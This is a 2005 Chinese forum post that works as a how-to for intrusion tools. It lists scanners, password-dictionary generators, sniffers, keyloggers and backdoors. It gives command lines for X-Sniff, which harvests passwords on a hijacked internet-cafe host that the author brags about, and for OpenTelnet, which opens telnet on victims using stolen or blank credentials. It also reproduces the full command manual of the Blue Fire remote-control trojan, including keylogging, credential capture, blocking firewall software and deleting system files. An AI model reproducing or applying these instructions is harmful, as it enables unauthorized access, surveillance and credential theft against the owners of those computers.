扫描类 流光、X-way、SuperScan、X-Scan
生成字典类 黑客字典、字典专家、超级字典生成器、生日密码生成器
嗅探监听类 X-Sniff、Winsniff、ARp-Killer、ARPSniffer、MyNetmon、NetXray
键盘纪录类 广外幽灵、血火
代理和跳板类 代理猎手 Snake
后门类 Hall、hacktelnet、BackDoor、Rmistaller、 winshell、蓝火
Win2000/NT密码破解类 SMBCrack
扫描类的就没什么讲的了都是有用户界面的。只要输入对方的ip进行扫描就行了。
生成字典类也比较简单也有界面,他会要你选择用什么生成字典是纯数字呢?还是字母等等。
嗅探类的我挑X-Sniff来说:X-Sniff可捕获局域网内FTP/SMTP/POP3/HTTP协议密码。运行参数说明:
xsniff <选项> <选项>含义如下:
-tcp : 输出TCP数据报 -udp : 输出UDP数据报
-icmp : 输出ICMP数据报 -pass : 过滤密码信息
-hide : 后台运行 -host : 解析主机名
-addr : 过滤IP地址 -port <端口> : 过滤端口
-log <文件名> : 将输出保存到文件 -asc : 以ASCII形式输出
-hex : 以16进制形式输出比如:我入侵了xx网吧的Host(这时已经telnet上去了,哈哈!爽啊~~HOHOHO!),
输入:c:\xsniff.exe -hide -pass -log c:\winnt\pass.log这句话的意思是监听所有通过这台主机的密码(哈哈!比不
一会什么邮箱账号,游戏账号一大把啊)。并把截获到的密码放在c:\winnt目录下的password文件中!键盘纪录的我比较
喜欢用广外幽灵,他操作简单只要现在要纪录键盘的文件就行了。代理的代理猎手是进行大面积的扫描代理只要输入IP范
围就ok了!
后门类的我说说hacktelnet他有2个文件分别是OpenTelnet,ResumeTelnet。OpenTelnet是用来打开对方的telnet
只有知道了对方的用户名和密码还有存在空连接就可以这样使用:OpenTelnet.exe \\IP <帐号> <密码> :0: 不使用
NTLM 身份验证。1: 先尝试 NTLM 身份验证。如果失败,再使用用户名和密码。2: 只使用 NTLM 身份验证。 (假设IP
为192.168.1.1,用户名为admin,密码是:123456)c:\opentelnet \\192.168.1.1 admin 123456 1 9000这样我们就可
以:c:\telnet 192.168.1.1 9000如果对方的密码为空可以这样:c:\opentelnet \\192.168.1.1 admin "" 1 9000另外
那个ResumeTelnet是用来恢复Telnet配置的,并关闭Telnet服务器,它的用法:ResumeTelnet.exe \\ip <帐号> <密码>
例如:c:\resumetelnet \\192.168.1.1 admin 123456这下就可以了!另外附带一下hall和蓝火的帮助文件。感兴趣的
可以看看。
蓝色火焰0.5 Preview 2版帮助文档
●注意:从本版本开始,蓝色火焰的服务端由配置器生成!!!
●使用本控制程序的基本条件是------有机器被你控制了,也就是说有机器被你装上了蓝色火焰服务端(由配置器生成的)!
接下来,喜欢上bbs或者mud的朋友就容易得多了,你把那台机当成一个bbs或者mud就可以了,只是要注意:端口是19191简
单点也行,跟着我来吧:你要做的很简单,就是打开windows(不一定哦) 开始菜单->运行->输入telnet xxx.xxx.xxx.xxx 19191
这里xxx.xxx.xxx.xxx是你控制那台机的IP地址,怎么知道?$@#%#-----别问我哦,我也不知道哦。 端口是固定的19191,如
果连上(也就是你可以为所欲为的),你就会看到如下画面:***************“蓝色火焰”服务器端.***********************
******* 版本: V 0.5 Preview 2…… **************************** Copyright by Vinsa,2001.10****** Bluefire->这是蓝
色火焰的提示符,本程式需要在这个提示符下输入命令,以达到远程控制目的========================================
命令详解帮助 :
1 help 显示简要帮助信息
2 exit 退出当前连接
3 ver 显示版本信息
4 list 列出当前进程
5 passwd 列出记录的密码信息
6 clearpw 清空记录的密码信息
7 sysinfo 列出计算机的详细信息
8 halt 挂起
9 screen 运行屏幕保护程序
10 sice? 检测是否运行了Soft-ice如果有就……
11 force 注销当前用户
12 logoff 注销
13 shutdown 关机
14 reboot 重启
15 poweroff 强行关机
16 kill [Process ID] 杀死进程,格式如kill fffec309 其中fffec309是进程号,可以用list命令得到
17 hide[desktop/taskbar/start/trayicon/clock] 隐藏……,如 隐藏桌面: hide desktop 隐藏任务栏: hide taskbar
隐藏开始按钮: hide start隐藏右下角图标: hide trayicon隐藏时钟: hide clock
18 show [desktop/taskbar/start/trayicon/clock]显示…… 对应上面 ……
19 disable [mouse/desktop/task/taskbar/start/cad]锁定……锁定鼠标: disable mouse锁定桌面: disable desktop
锁定任务栏:disable task锁定开始按钮:disable start锁定Ctrl+Alt+delete: disable cad
20 enabled [mouse/desktop/task/taskbar/start/cad]把上面锁定的解锁
21 open [monitor/driver/ftp/http [dir]] 打开……打开显示器: open monitor打开光驱: open driver
打开Ftp服务器: open ftp 打开后就可以用各种ftp客户端控制,比如cuteFtp,leechftp,甚至Flashget的站点资源探素器
都可以进行浏览和文件管理打开http服务器:open http c:\windows这样表示以c:\windows为主目录进行web发布,当然可
以用IE,Netscape,Opera等等浏览器进行访问和下载文件
蓝色火焰0.4特色功能:
这一功能充满着幻想,用虚拟Web页的形式实现了用 浏览器(IE,Netscape,Opera等):察看系统信息,察看(/清空)捕获的密码,
看(/清空)纪录的键盘,捕获屏幕,进程管理(列出/杀死进程),关闭计算机等功能相当于由一般的TCP/IP协议控制的木马转变成
用http协议控制超级木马,可以绕过一些防火墙,呵呵要open http 然后 (失效外链已清理) 然后一
切都这么简单!也可以直接浏览捕获的屏幕图像
22 close [monitor/driver/ftp/http]关闭……对应上面的-----
23 catch [Jpeg Filename]捕获当前屏幕如 catch c:\screen.jpg然后可以open http c: 打开http服务器,在IE的地址栏里输入
(失效外链已清理) http打开IE输入
(失效外链已清理)
24 changeb [on/off]交换鼠标左右键changeb on还原鼠标左右键changeb off---------------------------------------
25 charspy [result/on/off]查看击键记录:charspy result禁止键盘记录:charspy off 开启键盘记录:charspy on (注意默认情
况下已经开启)(记录各种按键,结果不存盘)---------------------------------------
26 keyspy [result/on/off/clear]查看击键记录:keyspy result禁止键盘记录:keyspy off 开启键盘记录:keyspy on (注意默认
情况下已经开启)清空键盘纪录:keyspy clear(这里和上面不同的是这里可以记录中文输入,并将结果存盘) snapexe 设置EXE文件关连
28 unsnapexe 解除EXE文件关连---------------------------------------
29 bladd [filename]/blview/blclear黑名单管理(在关连了exe文件后黑名单生效)将程序加入黑名单用法:bladd regedit(禁用注册表
编辑器)bladd skynet (禁用天网)bladd msconfigbladd qq2000 (这个太狠了,禁用oicq)bladd windows(禁用windows目录下所有东西)
bladd ………………………………自己想加什么就加什么,看XXX不爽就bladd XXX 查看当前黑名单blview 清空当前黑名单 blclear
30 recstart[wav filename]/recstop/recstate 开始录制一段声音: recstart c:\test.wav结束录制 : recstop显示录音机当前状态
: recstate ------------------------------------
31 cmd [dos command line] 运行dos命令:如 cmd dircmd type c:\test.txtcmd del c:\msdos.sys(呵呵,这个删掉就麻烦了)
32 run [filename]运行命令 如:run c:\test.wavrun c:\windows\system\msconfig.exerun c:\screen.jpg
33 chat [messages you want to send]打开聊天窗口和被控机聊天用法很简单,如:chat 你好chat 你被我控制了chat 你好可怜那
chat # (这个表示关闭聊天窗口)
34 changetelnetport [port]远程修改telnet端口 用法如 changetelnetport 23表示把telnet端口修改为 23服务端重启(restart)后
生效
35 changeftpport [port]远程修改ftp端口 用法如 changeftpport 21表示把ftp端口修改为 21服务端重启(restart)后生效
36 changehttpport [port]远程修改http端口 用法如 changehttpport 80表示把http端口修改为 80服务端重启(restart)后生效
37 changepasswd [new password]远程修改telnet密码用法如 changepasswd 123456表示把telnet密码修改为 123456服务端重启
(restart)后生效
38 viewsetup远程察看当前配置-------------------------------------
39 restart远程重启bluefire服务端,使修改的设置生效
====================================V0.5 Preview 2 版
快捷命令列表:
l = listk = killh = hides = showc = catchd = disablee = enabled! = cmdr = run: = chatpw = passwdcpw = clearpwsi
= sysinfoks = keyspycs = chatspyks r = keyspy resultks c = keyspy clearcs r= charspy result
ctp = changetelnetportcfp = changeftpportchp = changehttpportcpp = changepasswd
=======================================AllinOne V0.4 for Win2000 使用说明书.by lion.======================================
d:\>dir HAll.exe 驱动器 D 中的卷没有标签。 卷的序列号是 8084-DE58 d:\ 的目录2002-05-10 17:53 62,976 HAll.exe
1 个文件 62,976 字节 0 个目录 619,315,200 可用字节d:\>HAll -h=======================
HUC AllinOne V0.40 for Win2000 = By Lion, Welcome to (失效外链已清理) ================= [BackDoor:] -start -bind
-setup [ ] [Files:] - [Flood:] - [Process:] ->[System:] -[Scanner:] - [Services:] - [Transmit:] -
|
蜀ICP备12004085号-1 )暂时留空
发表于 2005-3-2 14:25:26